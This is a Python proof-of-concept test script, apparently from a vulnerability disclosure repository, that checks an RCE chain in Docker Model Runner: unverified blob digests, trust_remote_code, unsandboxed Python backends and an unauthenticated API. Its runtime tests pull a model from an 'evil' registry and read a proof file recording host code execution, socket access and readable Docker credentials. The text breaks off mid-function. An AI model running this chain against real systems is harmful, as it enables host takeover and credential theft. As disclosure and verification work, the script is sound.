5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / test_claims.py PY
#!/usr/bin/env python3
#
# Claim validation for the Docker Model Runner RCE.
#
# Static tests read the source. They show the bug exists in the codebase but
# don't show it can actually be triggered. Runtime tests do the latter.
#
# Usage:
#   python3 test_claims.py                  # all tests
#   python3 test_claims.py --json           # machine output
#   python3 test_claims.py --runtime-only   # skip static
#   python3 test_claims.py --static-only    # skip runtime
#
# Env:
#   REPO_ROOT      path to the model-runner repo (default: ../ from this file)
#   REGISTRY_HOST  registry host for HTTP probes (default: localhost)
#   REGISTRY_PORT  registry port (default: 5555)
#   PROOF_FILE     where the payload writes proof (default: /tmp/poc_rce_proof)

import hashlib
import json
import os
import re
import subprocess
import sys
import time
import urllib.request
import urllib.error
from pathlib import Path

# Paths and registry coordinates; each one can be overridden through the
# environment variable of the same name.
REPO_ROOT = Path(
    os.getenv("REPO_ROOT", Path(__file__).resolve().parent.parent)
)
REGISTRY_HOST = os.getenv("REGISTRY_HOST", "localhost")
REGISTRY_PORT = int(os.getenv("REGISTRY_PORT", "5555"))
PROOF_FILE = os.getenv("PROOF_FILE", "/tmp/poc_rce_proof")

# Model Runner is on the host so it reaches the registry via localhost
# (port-mapped from the registry container).
PULL_MODEL_NAME = "localhost:{}/evil/rce-model:latest".format(REGISTRY_PORT)
MODEL_RUNNER_URL = "http://model-runner.docker.internal"

# ANSI escape sequences used to colour terminal output.
GREEN, RED, YELLOW = "\033[92m", "\033[91m", "\033[93m"
CYAN, BOLD, RESET = "\033[96m", "\033[1m", "\033[0m"

# Colours are blanked unless stdout is a terminal and --json was not passed.
if not (sys.stdout.isatty() and "--json" not in sys.argv):
    GREEN = RED = YELLOW = CYAN = BOLD = RESET = ""

# One record is appended here by every log_result() call.
results = []


def log_result(claim_id, description, passed, detail="", proves=""):
    """Record one claim outcome in ``results`` and print a status line.

    ``passed`` selects the label: True -> PASS, False -> FAIL, None -> SKIP.
    Any other value raises KeyError before anything is recorded.
    The indented ``detail`` lines are printed unless --json is on the
    command line; ``proves`` is only stored, never printed here.
    """
    labels = {
        True: f"{GREEN}PASS{RESET}",
        False: f"{RED}FAIL{RESET}",
        None: f"{YELLOW}SKIP{RESET}",
    }
    label = labels[passed]

    record = {
        "id": claim_id,
        "desc": description,
        "passed": passed,
        "detail": detail,
        "proves": proves,
    }
    results.append(record)

    print(f"  [{label}] {claim_id}: {description}")
    if not detail or "--json" in sys.argv:
        return
    for row in detail.strip().split("\n"):
        print(f"         {row}")


def read_file(path):
    """Return the text of ``path`` (relative to REPO_ROOT), or None.

    None is returned when the path does not name a regular file, so a
    directory with the same name no longer raises from ``read_text``.
    The file is decoded as UTF-8 regardless of the process locale;
    undecodable bytes are replaced rather than aborting the static scan.
    """
    full = REPO_ROOT / path
    if not full.is_file():
        return None
    return full.read_text(encoding="utf-8", errors="replace")


def grep_file(path, pattern):
    """Return ``(line_number, stripped_line)`` for lines matching ``pattern``.

    ``path`` is read through read_file(); a missing file yields an empty
    list. ``pattern`` is applied with ``re.search`` to each raw line, and
    line numbers start at 1.
    """
    text = read_file(path)
    if text is None:
        return []

    hits = []
    for lineno, raw in enumerate(text.split("\n"), start=1):
        if re.search(pattern, raw):
            hits.append((lineno, raw.strip()))
    return hits


def http_get(url, timeout=5):
    """GET ``url`` and return ``(status, body)``.

    Returns:
        (int, bytes) for any HTTP response, including error statuses
        (the HTTPError's code and body are returned rather than raised).
        (None, str) with the exception text for every other failure,
        such as an invalid URL, refused connection or timeout.

    The response object is always closed so repeated probes do not leak
    sockets.
    """
    try:
        with urllib.request.urlopen(urllib.request.Request(url),
                                    timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        # HTTPError doubles as the response object; read it, then release it.
        try:
            return e.code, e.read()
        finally:
            e.close()
    except Exception as e:
        return None, str(e)


def docker_run(args, timeout=30):
    """Run ``curlimages/curl:latest`` with ``args`` appended to the command.

    Returns ``(returncode, stdout, stderr)`` from the finished process.
    A timeout yields ``(-1, "", "timeout")`` and a missing docker binary
    yields ``(-1, "", "docker not found")``.
    """
    # minimal container - truly unprivileged
    base = [
        "docker", "run", "--rm", "--no-healthcheck",
        "--security-opt=no-new-privileges",
        "curlimages/curl:latest",
    ]
    try:
        proc = subprocess.run(base + args, capture_output=True, text=True,
                              timeout=timeout)
    except subprocess.TimeoutExpired:
        return -1, "", "timeout"
    except FileNotFoundError:
        return -1, "", "docker not found"
    return proc.returncode, proc.stdout, proc.stderr


# Claim 1 - blob digest verification is absent (static)
def test_claim_1():
    """Static check for claim 1: a download is renamed into place unhashed.

    Reads pkg/distribution/internal/store/blobs.go under REPO_ROOT and logs
    three results through log_result():
      1a - io.Copy(f, r) and a later os.Rename are both found inside
           WriteBlobWithResume, with no oci.SHA256 call between them.
      1b - SHA256 is defined in oci/hash.go and every oci.SHA256( call in
           blobs.go sits before the io.Copy line.
      1c - no verification-related keyword appears on a non-comment line
           strictly between the copy and the rename.
    If blobs.go is missing only a failing 1a is logged.
    """
    print(f"\n{BOLD}{CYAN}Claim 1: blob digest verification is absent{RESET}")

    blobs_go = read_file("pkg/distribution/internal/store/blobs.go")
    if blobs_go is None:
        log_result("1a", "blobs.go not found", False,
                   f"Expected at {REPO_ROOT}/pkg/distribution/internal/store/blobs.go")
        return

    lines = blobs_go.split("\n")

    # 1a - find io.Copy in WriteBlobWithResume, confirm no hash after it
    in_func = False
    io_copy_line = None
    rename_line = None
    for i, line in enumerate(lines, 1):
        if "func" in line and "WriteBlobWithResume" in line:
            in_func = True
        elif in_func and line.startswith("}"):
            # A closing brace at column 0 ends the function; stop matching so
            # io.Copy / os.Rename in later functions are not picked up.
            in_func = False
        if in_func:
            if "io.Copy(f, r)" in line and io_copy_line is None:
                io_copy_line = i
            if io_copy_line and "os.Rename" in line and rename_line is None:
                rename_line = i

    located = io_copy_line is not None and rename_line is not None

    hash_between = located and any(
        "oci.SHA256" in lines[i - 1] for i in range(io_copy_line, rename_line))

    log_result("1a",
        "WriteBlobWithResume: io.Copy at line {}, os.Rename at line {}, no hash between".format(
            io_copy_line, rename_line),
        located and not hash_between,
        f"Lines {io_copy_line}-{rename_line}: raw copy then immediate rename, no verification.",
        proves="Download path writes bytes to disk and renames to final path with "
               "no digest check anywhere in between.")

    # 1b - SHA256 exists but only in the resume path (before io.Copy)
    hash_go = read_file("pkg/distribution/oci/hash.go")
    sha256_exists = hash_go is not None and "func SHA256(" in hash_go
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go", r"oci\.SHA256\(")
    all_before_copy = all(ln < (io_copy_line or 0) for ln, _ in sha256_calls)

    log_result("1b",
        "SHA256 exists but only called in the resume path (before io.Copy)",
        sha256_exists and len(sha256_calls) > 0 and all_before_copy,
        f"oci.SHA256 calls at lines: {[ln for ln, _ in sha256_calls]}. "
        f"io.Copy at line {io_copy_line}. All calls precede the download.",
        proves="The hash function exists but is never applied to a fresh download. "
               "It's only used to decide whether an .incomplete file is already done.")

    # 1c - nothing after io.Copy verifies the content before rename
    if not located:
        # Nothing was scanned, so the claim is untested rather than proven;
        # this also avoids arithmetic on a None line number.
        log_result("1c",
            "No verification code between io.Copy and os.Rename",
            None,
            "io.Copy / os.Rename not located in WriteBlobWithResume; nothing to check.")
        return

    check_words = ["digest", "hash", "verify", "compare", "SHA256", "sha256", "checksum"]
    post_copy_checks = []
    for i in range(io_copy_line + 1, rename_line):
        line = lines[i - 1]
        if any(w in line for w in check_words) and not line.strip().startswith("//"):
            post_copy_checks.append((i, line.strip()))

    log_result("1c",
        "No verification code between io.Copy and os.Rename",
        len(post_copy_checks) == 0,
        f"Checked lines {io_copy_line+1}-{rename_line-1}: "
        f"{'no verification found' if not post_copy_checks else post_copy_checks}",
        proves="A malicious registry can serve any bytes for a given declared digest "
               "and Model Runner stores them without complaint.")


# Claim 2 - registry serves model, Model Runner accepts it (runtime)
def test_claim_2():
    """Runtime check for claim 2: Model Runner pulls from the PoC registry.

    Logs three results through log_result():
      2a - the registry's /_poc/selftest endpoint answers 200 and reports
           ``passed``.
      2b - a POST to /api/pull, issued with curl from a container, exits 0
           without "error" in the response.
      2c - the pulled model shows up in /api/tags.
    All three are logged as SKIP when the registry is unreachable; 2b and 2c
    are logged as SKIP when docker or Model Runner is unavailable.
    """
    print(f"\n{BOLD}{CYAN}Claim 2: malicious registry accepted by Model Runner{RESET}")

    # 2a - PoC registry is up and internally consistent
    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
    if status is None or status != 200:
        log_result("2a", "Registry self-test", None,
                   f"Registry not reachable at {REGISTRY_HOST}:{REGISTRY_PORT}: {body}")
        log_result("2b", "Model Runner accepts pull", None, "Registry not running")
        log_result("2c", "Pulled model appears in model list", None, "Registry not running")
        return

    # The body comes off the network: a malformed reply is reported as a
    # failed self-test instead of aborting the whole run.
    try:
        selftest = json.loads(body)
    except ValueError:
        selftest = None

    if isinstance(selftest, dict):
        log_result("2a", "Registry self-test passes (digests consistent, valid OCI)",
                   selftest.get("passed") is True,
                   f"Blob count: {selftest.get('blob_count')}, errors: {selftest.get('errors')}",
                   proves="The PoC serves valid OCI content. All digests match, this isn't "
                          "a malformed artifact.")
    else:
        log_result("2a", "Registry self-test passes (digests consistent, valid OCI)",
                   False,
                   f"Self-test endpoint did not return a JSON object: {body[:200]!r}")

    # 2b - pull the model via Model Runner from inside a container
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=60)

    if rc == -1 and "docker not found" in stderr:
        log_result("2b", "Pull model via Model Runner", None, "docker not available")
        log_result("2c", "Pulled model in model list", None, "docker not available")
        return

    # curl runs with -s, which suppresses its error text, so the message
    # checks alone never fire. Exit code 6 (could not resolve host) and
    # 7 (failed to connect) identify an unreachable Model Runner.
    unreachable = (rc in (6, 7)
                   or "Could not resolve host" in stdout
                   or "Connection refused" in stdout)
    if unreachable:
        log_result("2b", "Pull model via Model Runner", None,
                   f"Model Runner not reachable (curl exit {rc}): {stdout[:200]}")
        log_result("2c", "Pulled model in model list", None, "Model Runner not reachable")
        return

    pull_ok = rc == 0 and "error" not in stdout.lower()
    log_result("2b", "Model Runner pulls from a malicious registry without complaint",
               pull_ok,
               f"Exit code: {rc}\nResponse: {stdout[:300]}",
               proves="Model Runner accepted a model from an attacker-controlled registry. "
                      "Pull completed, no digest verification failure.")

    # 2c - verify the model appears in the list
    rc2, stdout2, stderr2 = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/api/tags 2>&1'
    ], timeout=15)

    model_listed = PULL_MODEL_NAME.replace(":latest", "") in stdout2 or "evil" in stdout2.lower()
    log_result("2c", "Pulled model appears in Model Runner's model list",
               model_listed if rc2 == 0 else None,
               f"Model list response: {stdout2[:300]}",
               proves="Malicious model is stored and available for inference.")


# Claim 3 - Python backends enable trust_remote_code (static + runtime)
def test_claim_3():
    """Static check for claim 3: the Go launchers never touch trust_remote_code.

    Logs two results through log_result():
      3a - none of the readable backend sources mentions
           trust-remote-code / trust_remote_code. Logged as SKIP when no
           backend file could be read, so a wrong REPO_ROOT is not
           reported as a proven claim.
      3b - vllm_metal.go contains the literal ``"--model"``.
    """
    print(f"\n{BOLD}{CYAN}Claim 3: Python backends enable trust_remote_code{RESET}")

    # 3a - Go side doesn't pass --no-trust-remote-code anywhere
    backend_files = [
        ("vllm", "pkg/inference/backends/vllm/vllm.go"),
        ("vllm-metal", "pkg/inference/backends/vllm/vllm_metal.go"),
        ("vllm-config", "pkg/inference/backends/vllm/vllm_config.go"),
        ("mlx", "pkg/inference/backends/mlx/mlx.go"),
        ("sglang", "pkg/inference/backends/sglang/sglang.go"),
    ]
    trust_flag_found = {}
    searched = []  # backends whose source was actually read
    for name, path in backend_files:
        content = read_file(path)
        if not content:
            continue
        searched.append(name)
        if "trust-remote-code" in content or "trust_remote_code" in content:
            trust_flag_found[name] = grep_file(path, r"trust.remote.code")

    # An absence claim only means something if at least one file was scanned.
    flag_absent = (len(trust_flag_found) == 0) if searched else None

    log_result("3a",
        "No backend passes --no-trust-remote-code or --trust-remote-code",
        flag_absent,
        f"Searched {len(searched)} of {len(backend_files)} backend files. "
        f"Flag references: {trust_flag_found if trust_flag_found else 'none'}",
        proves="The Go launcher never disables vLLM's default trust_remote_code behavior. "
               "vLLM imports code referenced by auto_map in tokenizer_config.json. "
               "(The actual trust_remote_code=True default lives in the upstream vLLM "
               "package, not this repo. This test only confirms the Go side doesn't "
               "override it.)")

    # 3b - vllm-metal passes --model pointing at an unverified directory
    vllm_metal = read_file("pkg/inference/backends/vllm/vllm_metal.go")
    passes_model_path = vllm_metal is not None and '"--model"' in vllm_metal

    log_result("3b",
        "vllm-metal passes --model <path> where path is the unverified blob store",
        passes_model_path,
        "vllm_metal.go passes --model pointing to the bundle directory. The contents\n"
        "come from the blob store, which has no integrity checks (claim 1).\n"
        "AutoTokenizer.from_pretrained() with trust_remote_code=True then imports any\n"
        ".py referenced by auto_map in tokenizer_config.json.",
        proves="The path given to vLLM points at attacker-controlled content. With "
               "claim 3a, that means arbitrary Python import from the model dir.")


# Claim 4 - Python backends run without sandboxing (static)
def test_claim_4():
    """Static check for claim 4: Python backends set an empty SandboxConfig.

    Logs two results through log_result():
      4a - every listed Python backend source has a line matching
           ``SandboxConfig:\\s*""``.
      4b - llamacpp.go has a line matching
           ``SandboxConfig.*sandbox\\.Configuration``.
    """
    print(f"\n{BOLD}{CYAN}Claim 4: Python backends run without sandboxing{RESET}")

    python_backends = {
        "vllm": "pkg/inference/backends/vllm/vllm.go",
        "vllm-metal": "pkg/inference/backends/vllm/vllm_metal.go",
        "mlx": "pkg/inference/backends/mlx/mlx.go",
        "sglang": "pkg/inference/backends/sglang/sglang.go",
        "diffusers": "pkg/inference/backends/diffusers/diffusers.go",
    }

    # One grep per backend; a backend with no hit (or no file) counts as
    # "sandboxed" in the report below.
    empty_config_hits = {
        backend: grep_file(source, r'SandboxConfig:\s*""')
        for backend, source in python_backends.items()
    }
    unsandboxed = [
        f"{backend} (line {hits[0][0]})"
        for backend, hits in empty_config_hits.items()
        if hits
    ]
    sandboxed = [backend for backend, hits in empty_config_hits.items() if not hits]

    total = len(python_backends)
    log_result(
        "4a",
        f'All {total} Python backends have SandboxConfig=""',
        len(unsandboxed) == total,
        f"Unsandboxed: {unsandboxed}\nSandboxed: {sandboxed if sandboxed else 'none'}",
        proves="No OS-level sandbox on any Python backend. Code imported via "
               "trust_remote_code runs with the full privileges of the Model Runner "
               "process (the Docker Desktop user).",
    )

    # 4b - contrast: llama.cpp IS sandboxed
    sandbox_hits = grep_file(
        "pkg/inference/backends/llamacpp/llamacpp.go",
        r"SandboxConfig.*sandbox\.Configuration",
    )
    log_result(
        "4b",
        "llama.cpp (C++ backend) actually configures a sandbox",
        len(sandbox_hits) > 0,
        f"llama.cpp: {sandbox_hits}",
        proves="The codebase knows how to sandbox backends. Python ones being unsandboxed "
               "is a choice (or at least a gap), not a missing framework.",
    )


# Claim 5 - internal API has no auth (static + runtime)
def test_claim_5():
    """Static and runtime checks for claim 5: the API needs no credentials.

    Logs up to four results through log_result():
      5a-code    - launch.go mentions model-runner.docker.internal.
      5b         - no auth-looking identifier appears in the readable HTTP
                   handler sources (SKIP when none could be read).
      5c         - cors.go reads the Origin header and only rejects a
                   non-empty Origin (SKIP when cors.go is missing or empty).
      5d-runtime - a container started by docker_run() gets HTTP 200 from
                   /api/tags. Nothing is logged for 5d when docker is
                   missing beyond a SKIP entry.
    """
    print(f"\n{BOLD}{CYAN}Claim 5: internal API reachable without auth{RESET}")

    # 5a - model-runner.docker.internal is the configured endpoint
    launch_go = read_file("cmd/cli/commands/launch.go")
    has_endpoint = launch_go is not None and "model-runner.docker.internal" in launch_go

    log_result("5a-code",
        "model-runner.docker.internal endpoint configured in launch.go",
        has_endpoint,
        proves="Docker Desktop exposes Model Runner to every container at this address.")

    # 5b - no auth middleware on API handlers
    handler_files = [
        "pkg/ollama/http_handler.go",
        "pkg/inference/scheduling/http_handler.go",
        "pkg/inference/models/http_handler.go",
    ]
    auth_patterns = ["authMiddleware", "requireAuth", "checkAuth",
                     "apiKey", "api_key", "Authorization"]
    auth_evidence = []
    searched = 0  # handler files that were actually read
    for path in handler_files:
        if not read_file(path):
            continue
        searched += 1
        reported = set()  # line numbers already listed for this file
        for pattern in auth_patterns:
            for ln, line in grep_file(path, pattern):
                if ln in reported:
                    # Same line matched an earlier pattern; list it once.
                    continue
                # exclude: BearerToken (used for upstream registry auth), comments, tests
                if ("BearerToken" in line or "bearer" in line.lower()
                        or line.strip().startswith("//")):
                    continue
                reported.add(ln)
                auth_evidence.append(f"{path}:{ln}: {line}")

    # An absence claim only means something if at least one file was scanned.
    no_auth = (len(auth_evidence) == 0) if searched else None

    log_result("5b",
        "No authentication middleware on API handlers",
        no_auth,
        f"Searched {searched} of {len(handler_files)} handler files.\n"
        f"Auth enforcement: {auth_evidence if auth_evidence else 'none'}",
        proves="/api/pull and /engines/v1/chat/completions take requests from any "
               "container with no credentials.")

    # 5c - CORS only blocks requests WITH a disallowed Origin
    cors_desc = "CORS only blocks if Origin is set and not allowed (empty Origin passes)"
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        has_origin_check = 'r.Header.Get("Origin")' in cors_go
        # key line: `if origin != "" && !allowed` - empty origin is never blocked.
        # Matching the shorter `origin != ""` also covers that longer form.
        allows_empty_origin = 'origin != ""' in cors_go

        log_result("5c",
            cors_desc,
            has_origin_check and allows_empty_origin,
            'cors.go line 29: `if origin != "" && !allowed` -> 403.\n'
            "Requests with no Origin (all container curl requests) are never blocked.\n"
            "CORS is a browser-only thing.",
            proves="The only access control (CORS) does nothing for container-to-API "
                   "requests. No defense against non-browser clients.")
    else:
        # Record the gap explicitly instead of silently dropping the check.
        log_result("5c", cors_desc, None,
                   "pkg/middleware/cors.go not found or empty; nothing was checked.")

    # 5d - runtime: reach Model Runner from an unprivileged container
    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)

    if rc == -1 and "docker not found" in stderr:
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   "docker not available")
        return

    status_code = stdout.strip()
    if status_code in ("000", ""):
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   f"Model Runner not reachable (HTTP {status_code}). "
                   "Is Docker Desktop Model Runner enabled?")
    else:
        log_result("5d-runtime",
            f"Unprivileged container reaches Model Runner API (HTTP {status_code})",
            status_code == "200",
            f"Container ran with --no-healthcheck --security-opt=no-new-privileges.\n"
            f"No Docker socket mount, no --privileged, no caps.",
            proves="Unprivileged container with default config reaches the API.")


# Claim 6 - RCE on host as Docker Desktop user (runtime)
def test_claim_6():
    """Runtime check for claim 6: evaluate the proof file left by the payload.

    Loads PROOF_FILE as a JSON object and logs results 6a-6g through
    log_result(), each derived from fields of that object (rce, user/uid,
    docker socket, docker ps, docker version, docker config).
    When the file is missing, unreadable, not valid JSON, or not a JSON
    object, 6a-6c are logged as SKIP and the function returns.
    Fields that are absent or null are treated as "not provided" rather
    than raising.
    """
    print(f"\n{BOLD}{CYAN}Claim 6: code executes on host as Docker Desktop user{RESET}")

    proof_path = Path(PROOF_FILE)
    if not proof_path.exists():
        log_result("6a", "Host-level code execution", None,
                   f"Proof file {PROOF_FILE} missing.\n"
                   "Run the full attack first (./run_poc.sh full)")
        log_result("6b", "Host filesystem access", None, "Proof file missing")
        log_result("6c", "Runs as Docker Desktop user", None, "Proof file missing")
        return

    # ValueError covers both json.JSONDecodeError and UnicodeDecodeError.
    problem = None
    proof = None
    try:
        proof = json.loads(proof_path.read_text())
    except (ValueError, OSError) as e:
        problem = str(e)
    else:
        if not isinstance(proof, dict):
            problem = f"expected a JSON object, got {type(proof).__name__}"

    if problem is not None:
        log_result("6a", "Host-level code execution", None,
                   f"Proof file exists but is unreadable: {problem}")
        log_result("6b", "Host filesystem access", None, "Proof file unreadable")
        log_result("6c", "Runs as Docker Desktop user", None, "Proof file unreadable")
        return

    # 6a - code executed
    log_result("6a", "Arbitrary code executed on host",
               proof.get("rce") is True,
               f"Hostname: {proof.get('hostname')}\n"
               f"User: {proof.get('user')}\n"
               f"PID: {proof.get('pid')}",
               proves="evil_tokenizer.py ran and wrote proof to the HOST filesystem "
                      "(not inside a container).")

    # 6b - host filesystem access
    log_result("6b", "Process has host filesystem access",
               proof.get("can_read_etc_passwd") is True,
               f"Can read /etc/passwd: {proof.get('can_read_etc_passwd')}\n"
               f"Can write /tmp: {proof.get('can_write_tmp')}\n"
               f"Working dir: {proof.get('cwd')}\n"
               f"Model dir: {proof.get('model_dir')}",
               proves="Process can read sensitive host files (/etc/passwd) and write "
                      "to host directories (/tmp). Not sandboxed.")

    # 6c - Docker Desktop user (not root, not container user)
    # Normalise to str so a null or numeric field cannot break the checks.
    uid_str = str(proof.get("uid") or "")
    user = str(proof.get("user") or "")
    is_host_user = user != "" and user != "root" and "uid=0" not in uid_str

    log_result("6c", f"Runs as host user '{user}' (not root, not container user)",
               is_host_user,
               f"uid line: {uid_str}\n"
               f"HOME: {proof.get('env_HOME')}",
               proves="Code runs as the Docker Desktop user with their full privileges, "
                      "file access, network.")

    # Container escape proof - host RCE can control the Docker daemon, which
    # gives full container escape: unpriv container -> host RCE -> daemon -> any container.

    # 6d - Docker socket accessible from host
    socket_exists = proof.get("docker_socket_exists")
    socket_writable = proof.get("docker_socket_writable")

    if socket_exists is None:
        log_result("6d", "Docker socket accessible from host-side payload", None,
                   "Proof file missing docker_socket fields (older payload)")
    else:
        log_result("6d", "Docker socket accessible from host-side payload",
                   socket_exists is True,
                   f"Socket exists: {socket_exists}\n"
                   f"Socket writable: {socket_writable}",
                   proves="Host-side payload can hit the Docker socket. Attacker controls "
                          "the daemon from code that started life in an unprivileged container.")

    # 6e - can enumerate every running container
    docker_ps = proof.get("docker_ps")
    ps_count = proof.get("docker_ps_count") or 0

    if docker_ps is None:
        log_result("6e", "Host-side payload can enumerate all containers", None,
                   "docker ps not available or failed")
    else:
        log_result("6e", f"Host-side payload sees {ps_count} running container(s) via docker ps",
                   ps_count > 0,
                   f"docker ps output:\n{docker_ps}",
                   proves="From host-side RCE, attacker sees every container. With socket "
                          "write access they can exec into, stop, or create more.")

    # 6f - Docker daemon version accessible
    docker_ver = proof.get("docker_version")

    if docker_ver is None:
        log_result("6f", "Host-side payload can query Docker daemon", None,
                   "docker version not available or failed")
    else:
        log_result("6f", f"Host-side payload talks to Docker daemon (v{docker_ver})",
                   bool(docker_ver),
                   f"Docker version: {docker_ver}",
                   proves="Payload talks to the Docker daemon API. Equivalent to having "
                          "the socket mounted: create privileged containers, mount the "
                          "host filesystem, pivot elsewhere.")

    # 6g - Docker credentials readable
    config_exists = proof.get("docker_config_exists")
    has_auths = proof.get("docker_config_has_auths")
    registries = proof.get("docker_config_registries") or []

    if config_exists is None:
        log_result("6g", "Docker registry credentials accessible from host", None,
                   "docker_config fields missing from proof")
    elif not config_exists:
        log_result("6g", "Docker registry credentials file not present", None,
                   "~/.docker/config.json doesn't exist (no registries logged in)")
    else:
        log_result("6g",
            f"Docker config accessible ({len(registries)} registries)",
            config_exists is True,
            f"~/.docker/config.json exists: {config_exists}\n"
            f"Has auth entries: {has_auths}\n"
            f"Registries: {registries}\n"
            "NOTE: actual credentials are NOT exfiltrated, only proving access.",
            proves="Attacker can read Docker registry creds from the host. Supply chain "
                   "attacks: push malicious images to any registry the user is logged into.")


# Claim 7 - malicious content persists (static)
def test_claim_7():
    """Static check for claim 7: stored blobs are never re-verified.

    Logs two results through log_result():
      7a - no New/Open/Init/Load function in store.go contains a
           non-comment line mentioning SHA256, verify, integrity or
           checksum. Logged as SKIP when store.go cannot be read, so a
           missing file is not reported as a proven claim.
      7b - blobs.go calls hasBlob( and has an ``if hasBlob`` line.
    """
    print(f"\n{BOLD}{CYAN}Claim 7: malicious content persists in blob store{RESET}")

    store_go = read_file("pkg/distribution/internal/store/store.go")

    # 7a - no integrity check during store init/open
    init_verifies = False
    if store_go:
        lines = store_go.split("\n")
        in_init = False
        for i, line in enumerate(lines, 1):
            if re.match(r'func.*\b(New|Open|Init|Load)\b', line):
                in_init = True
            if in_init:
                if any(w in line for w in ["SHA256", "verify", "integrity", "checksum"]):
                    if not line.strip().startswith("//"):
                        init_verifies = True
                        break
                # A closing brace at column 0 ends the current function.
                if line.startswith("}"):
                    in_init = False

    if store_go:
        log_result("7a", "No integrity check when the blob store is opened",
                   not init_verifies,
                   f"Checked every New/Open/Init/Load in store.go.\n"
                   f"Integrity check found: {init_verifies}",
                   proves="Once stored, a blob is never re-verified. A malicious model "
                          "survives Docker Desktop restarts.")
    else:
        log_result("7a", "No integrity check when the blob store is opened",
                   None,
                   "pkg/distribution/internal/store/store.go not found or empty; "
                   "nothing was checked.")

    # 7b - hasBlob early-returns for existing blobs
    has_blob = grep_file("pkg/distribution/internal/store/blobs.go", r"hasBlob\(")
    early_return = grep_file("pkg/distribution/internal/store/blobs.go",
                              r"if hasBlob\b")

    log_result("7b", "Existing blobs skip re-download (hasBlob early return)",
               len(has_blob) > 0 and len(early_return) > 0,
               f"hasBlob calls: {len(has_blob)}, early returns: {len(early_return)}",
               proves="Re-pulling the same model skips download if blobs exist. Tampered "
                      "content never gets refreshed or re-verified.")


# Edge cases
def test_edge_cases():
    """Static edge-case checks E1-E4, logged through log_result().

      E1 - blobs.go hashes ``existingFile`` and compares computedHash with
           diffID (the resume path).
      E2 - no ComputeDigest()/verifyManifest/manifest...SHA256 call site in
           the pull-path sources (SKIP when none of them could be read).
      E3 - unpack.go references validatePathWithinDirectory or
           filepath.IsLocal.
      E4 - cors.go reads the Origin header (SKIP when cors.go is missing
           or empty).
    """
    print(f"\n{BOLD}{CYAN}Edge cases{RESET}")

    # E1 - resume path only checks completeness, not fresh downloads
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                              r"oci\.SHA256\(existingFile\)")
    compare_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                               r"computedHash.*==.*diffID")

    log_result("E1",
        "Resume-path SHA256 only checks if an .incomplete file is already complete",
        len(sha256_calls) > 0 and len(compare_calls) > 0,
        "The SHA256 check runs only when an .incomplete file is sitting around from\n"
        "a previous interrupted download. It checks whether the file is already complete\n"
        "(hash matches diffID). It does not run on fresh downloads.",
        proves="The presence of SHA256 in the resume path isn't digest verification of "
               "downloaded content.")

    # E2 - manifest not crypto-verified after fetch
    # ComputeDigest() exists but isn't called during pull.
    pull_path_files = ["pkg/distribution/oci/remote/remote.go",
                       "pkg/distribution/internal/store/store.go",
                       "pkg/distribution/distribution/client.go"]
    manifest_verify_calls = []
    searched = 0  # pull-path files that were actually read
    for path in pull_path_files:
        if read_file(path) is None:
            continue
        searched += 1
        matches = grep_file(path, r"(\.ComputeDigest\(\)|verifyManifest|manifest.*SHA256)")
        manifest_verify_calls.extend([(path, ln, line) for ln, line in matches
                                      if not line.strip().startswith("//")])

    compute_digest_def = grep_file("pkg/distribution/oci/manifest.go", r"func.*ComputeDigest")

    # An absence claim only means something if at least one file was scanned.
    not_verified = (len(manifest_verify_calls) == 0) if searched else None

    log_result("E2",
        "Manifest content not cryptographically verified after fetch",
        not_verified,
        f"Searched {searched} of {len(pull_path_files)} pull-path files.\n"
        f"ComputeDigest() defined: {bool(compute_digest_def)}, "
        f"called during pull: {bool(manifest_verify_calls)}\n"
        f"Call sites found: {manifest_verify_calls if manifest_verify_calls else 'none'}",
        proves="Trust comes entirely from TLS. A compromised registry or MITM with a "
               "valid TLS cert can serve arbitrary manifests.")

    # E3 - path traversal protections exist (showing what IS protected)
    path_checks = grep_file("pkg/distribution/internal/bundle/unpack.go",
                             r"(validatePathWithinDirectory|filepath\.IsLocal)")
    log_result("E3",
        "Bundle unpacking has path traversal protections",
        len(path_checks) > 0,
        f"Safety checks found: {len(path_checks)} locations",
        proves="Path traversal via layer annotations is blocked. The attack vector here "
               "is code execution via trust_remote_code, not path traversal.")

    # E4 - CORS is the only access control
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        origin_only = 'r.Header.Get("Origin")' in cors_go
        log_result("E4",
            "CORS (Origin check) is the only access control",
            origin_only,
            proves="No IP filtering, no auth tokens, no mTLS. Containers bypass CORS by "
                   "just not sending an Origin header.")
    else:
        # Record the gap explicitly instead of silently dropping the check.
        log_result("E4",
            "CORS (Origin check) is the only access control",
            None,
            "pkg/middleware/cors.go not found or empty; nothing was checked.")


# Full attack chain (runtime)
def test_full_chain():
    """Run the end-to-end attack and log CHAIN-1..CHAIN-3 via log_result().

    Preconditions (docker responds to ``docker info``, the PoC registry's
    self-test endpoint answers 200, Model Runner answers 200 on /api/tags
    from a container) are checked first; if any fails a SKIP line is
    printed and nothing is logged.

    Steps:
      1. Remove stale proof files, then POST /api/pull from a container.
         A non-zero exit is logged as a failed CHAIN-1 and stops the run.
      2. POST a chat completion to trigger model loading (CHAIN-2).
      3. Poll up to ~10s for PROOF_FILE or PROOF_FILE.flag and log CHAIN-3.
    """
    print(f"\n{BOLD}{CYAN}Full attack chain{RESET}")

    try:
        r = subprocess.run(["docker", "info"], capture_output=True, timeout=10)
        if r.returncode != 0:
            print(f"  {YELLOW}SKIP{RESET}: docker not running")
            return
    except (FileNotFoundError, subprocess.TimeoutExpired):
        print(f"  {YELLOW}SKIP{RESET}: docker not available")
        return

    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
